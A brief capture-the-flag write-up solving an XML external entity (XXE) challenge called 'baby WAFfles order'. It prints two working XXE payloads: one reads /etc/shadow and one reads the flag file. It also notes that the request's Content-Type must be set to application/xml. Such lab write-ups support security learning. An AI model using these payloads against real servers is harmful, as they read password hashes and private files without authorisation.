OWASP Top 10 - baby WAFfles order

It will be an xxe injection.
https://portswigger.net/web-security/xxe
Let’s use burpsuit.
This is the original request:

Let’suse them:
https://github.com/payloadbox/xxe-injection-payload-list

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&ent;</lastName>
</userInfo>

We need a table_num and food.

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///flag"> ]>
<order>
 <table_num>1</table_num>
 <food>&ent;</food>
</order>

My payload was good but I had an error:

I need to change the Content-Type to application/xml.